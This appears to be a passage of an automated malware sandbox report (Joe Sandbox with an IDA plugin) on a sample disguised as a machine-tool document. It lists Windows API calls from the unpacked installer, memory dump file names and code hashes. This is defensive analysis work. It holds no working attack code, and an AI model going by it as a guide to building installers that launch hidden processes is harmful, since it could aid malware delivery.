                                                                                                                                                                                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2102729457-0
                                                                                                                                                                                                                          • Opcode ID: bf3565a8d54977e971102c74698aaa5ab0c905542a3b89f7c95156eeb2b10c0e
                                                                                                                                                                                                                          • Instruction ID: 2730d2a3776e1339b9346d87ab19af6b7380862a528adabe40aaf425641bd1fc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf3565a8d54977e971102c74698aaa5ab0c905542a3b89f7c95156eeb2b10c0e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68F054B090A270ABD621BF20FE4C99F7B74E7447117124476F004B21A4C67898C1CBAC
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 00404EB9
                                                                                                                                                                                                                          • CallWindowProcA.USER32(?,?,?,?), ref: 00404F0A
                                                                                                                                                                                                                            • Part of subcall function 00403F2E: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403F40
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                          • Opcode ID: 44b8d16fffa3cf511a27652146f874074467920310ea138c5a7b32cc615b7cdd
                                                                                                                                                                                                                          • Instruction ID: 4911906597f3eaa4ffbe68f0188cda158002c4f31c253b535ba85266db60279e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44b8d16fffa3cf511a27652146f874074467920310ea138c5a7b32cc615b7cdd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC0175B110020DABDB205F52EC81AAB3625F7C4751F204037FB01756D1C7399C51AAB9
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 004059B3
                                                                                                                                                                                                                          • GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 004059CD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                                                                                                          • String ID: nsa
                                                                                                                                                                                                                          • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                          • Opcode ID: 95c6d3479798503f7923504534165061c55f320a4664c3ca80cf9d12d42afe18
                                                                                                                                                                                                                          • Instruction ID: 3f05255bf470524d05267fbe77a66a547c73f63e6c4f6eb4cae2c62e5f282410
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95c6d3479798503f7923504534165061c55f320a4664c3ca80cf9d12d42afe18
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3F0E272708204ABEB108F55EC04B9B7B9CDF91720F10803BFA08DA180D2B098108BA9
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421528,Error launching installer), ref: 004054B7
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004054C4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Error launching installer, xrefs: 004054A1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                          • String ID: Error launching installer
                                                                                                                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                                                                                                                          • Opcode ID: 11830fbe1599591dde0320708e1ac997fc89973e1d072e2855f62d3e6df5e4ac
                                                                                                                                                                                                                          • Instruction ID: 371522acfb7cd9539d7ae69e543ca64f087bc7c9f75cc5940c594e3c03f6d28b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11830fbe1599591dde0320708e1ac997fc89973e1d072e2855f62d3e6df5e4ac
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6E04FF1A102097FEB009BA0EC05F7B7BBCE754704F404471BD01F21A0D678A8408A79
Memory Dump Source
• Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 61a2e03896eecfdf1d4da445d37de20e8426d4ebfe516142fa5c4c165488df89
• Instruction ID: 6cdc3ec63689871e8710e51dd90966e3aca29af0085505062bf66b2ee05b33a6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61a2e03896eecfdf1d4da445d37de20e8426d4ebfe516142fa5c4c165488df89
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25714571E04228CBDF28CF98C8547ADBBB1FB44305F11806ED856BB281C7786A96DF44
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: \;Zr$\;Zr$\;Zr$\;Zr
                                                                                                                                                                                                                          • API String ID: 0-4252169449
                                                                                                                                                                                                                          • Opcode ID: 233e95ba23dbe4e4fc042b75de76b92548099d0a2fb572c54fb5a60e4d919cdf
                                                                                                                                                                                                                          • Instruction ID: a79b53753bf96d12c9d68a3d4ac306d883f1aee82cc863711e9ce3a19adf9918
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 233e95ba23dbe4e4fc042b75de76b92548099d0a2fb572c54fb5a60e4d919cdf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 600171317002249FC75CDE2CC560AEA77E6AF88B6872541BAE406CB3B4DF72DC819790
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058E5
                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004058FD
                                                                                                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040590E
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                                                                                                          • Opcode ID: 0fc7b795b21fde4e840a5a8ebe1bc240de770827404be4bbaaf079e1ba8cc010
                                                                                                                                                                                                                          • Instruction ID: 18e4c75142147f65de27112721ce36ab9a51ac25249ca18f40cf651f68c78b39
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fc7b795b21fde4e840a5a8ebe1bc240de770827404be4bbaaf079e1ba8cc010
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01F0F632505414FFCB029FA4DD00D9EBBA8DF05360B2540B5F800F7250D234EE01AB99